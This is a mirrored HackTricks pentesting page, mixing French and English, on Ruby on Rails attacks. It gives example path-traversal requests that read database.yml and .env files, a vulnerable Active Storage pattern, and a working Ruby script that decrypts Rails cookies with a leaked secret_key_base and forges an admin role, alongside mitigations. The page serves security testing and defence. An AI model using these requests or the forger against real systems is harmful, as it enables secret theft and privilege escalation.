mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			101 lines
		
	
	
		
			5.4 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			101 lines
		
	
	
		
			5.4 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| # Astuces Ruby
 | |
| 
 | |
| {{#include ../../banners/hacktricks-training.md}}
 | |
| 
 | |
| ## File upload to RCE
 | |
| 
 | |
| Comme expliqué dans [cet article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.
 | |
| 
 | |
| Tips:
 | |
| - Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file upload that lands anywhere under `config/` and is later evaluated/required, you may obtain RCE at boot.
 | |
| - Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.
 | |
| 
 | |
| ## Active Storage image transformation → command execution (CVE-2025-24293)
 | |
| 
 | |
| When an application uses Active Storage with `image_processing` + `mini_magick`, and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection because some transformation methods were mistakenly allowed by default.
 | |
| 
 | |
| - A vulnerable pattern looks like:
 | |
| ```erb
 | |
| <%= image_tag blob.variant(params[:t] => params[:v]) %>
 | |
| ```
 | |
| where `params[:t]` and/or `params[:v]` are attacker-controlled.
 | |
| 
 | |
| - Ce qu'il faut essayer pendant les tests
 | |
| - Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.
 | |
| - Fuzz `params[:t]` and `params[:v]` for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host.
 | |
| - If you only have read-access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.
 | |
| 
 | |
| - Remédiation/détections
 | |
| - If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + `image_processing` + `mini_magick` and user-controlled transformations, consider it exploitable. Recommend upgrading and enforcing strict allowlists for methods/params and a hardened ImageMagick policy.
 | |
| 
 | |
| ## Rack::Static LFI / path traversal (CVE-2025-27610)
 | |
| 
 | |
| If the target stack uses Rack middleware directly or via frameworks, versions of `rack` prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via `Rack::Static` when `:root` is unset/misconfigured. Encoded traversal in `PATH_INFO` can expose files under the process working directory or an unexpected root.
 | |
| 
 | |
| - Hunt for apps that mount `Rack::Static` in `config.ru` or middleware stacks. Try encoded traversals against static paths, for example:
 | |
| ```text
 | |
| GET /assets/%2e%2e/%2e%2e/config/database.yml
 | |
| GET /favicon.ico/..%2f..%2f.env
 | |
| ```
 | |
| Adjust the prefix to match configured `urls:`. If the app responds with file contents, you likely have LFI to anything under the resolved `:root`.
 | |
| 
 | |
| - Mitigation: upgrade Rack; ensure `:root` only points to a directory of public files and is explicitly set.
 | |
| 
 | |
| ## Forging/decrypting Rails cookies when `secret_key_base` is leaked
 | |
| 
 | |
| Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.
 | |
| 
 | |
| Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, default in recent Rails):
 | |
| ```ruby
 | |
| require 'cgi'
 | |
| require 'json'
 | |
| require 'active_support'
 | |
| require 'active_support/message_encryptor'
 | |
| require 'active_support/key_generator'
 | |
| 
 | |
| secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
 | |
| raw_cookie = CGI.unescape(ARGV[0])
 | |
| 
 | |
| salt   = 'authenticated encrypted cookie'
 | |
| cipher = 'aes-256-gcm'
 | |
| key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
 | |
| secret  = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000).generate_key(salt, key_len)
 | |
| enc     = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)
 | |
| 
 | |
| plain = enc.decrypt_and_verify(raw_cookie)
 | |
| puts "Decrypted: #{plain.inspect}"
 | |
| 
 | |
| # Modify and re-encrypt (example: escalate role)
 | |
| plain['role'] = 'admin' if plain.is_a?(Hash)
 | |
| forged = enc.encrypt_and_sign(plain)
 | |
| puts "Forged cookie: #{CGI.escape(forged)}"
 | |
| ```
 | |
| Notes:
 | |
| - Les applications plus anciennes peuvent utiliser AES-256-CBC et des salts `encrypted cookie` / `signed encrypted cookie`, ou des sérialiseurs JSON/Marshal. Ajustez les salts, cipher, et serializer en conséquence.
 | |
| - En cas de compromission/évaluation, renouvelez `secret_key_base` pour invalider tous les cookies existants.
 | |
| 
 | |
| ## Voir aussi (vulnérabilités spécifiques à Ruby/Rails)
 | |
| 
 | |
| - Désérialisation Ruby et class pollution:
 | |
| {{#ref}}
 | |
| ../../pentesting-web/deserialization/README.md
 | |
| {{#endref}}
 | |
| {{#ref}}
 | |
| ../../pentesting-web/deserialization/ruby-class-pollution.md
 | |
| {{#endref}}
 | |
| {{#ref}}
 | |
| ../../pentesting-web/deserialization/ruby-_json-pollution.md
 | |
| {{#endref}}
 | |
| - Injection de template dans les moteurs Ruby (ERB/Haml/Slim, etc.):
 | |
| {{#ref}}
 | |
| ../../pentesting-web/ssti-server-side-template-injection/README.md
 | |
| {{#endref}}
 | |
| 
 | |
| 
 | |
| 
 | |
| ## Références
 | |
| 
 | |
| - Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
 | |
| - GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
 | |
| {{#include ../../banners/hacktricks-training.md}}
 |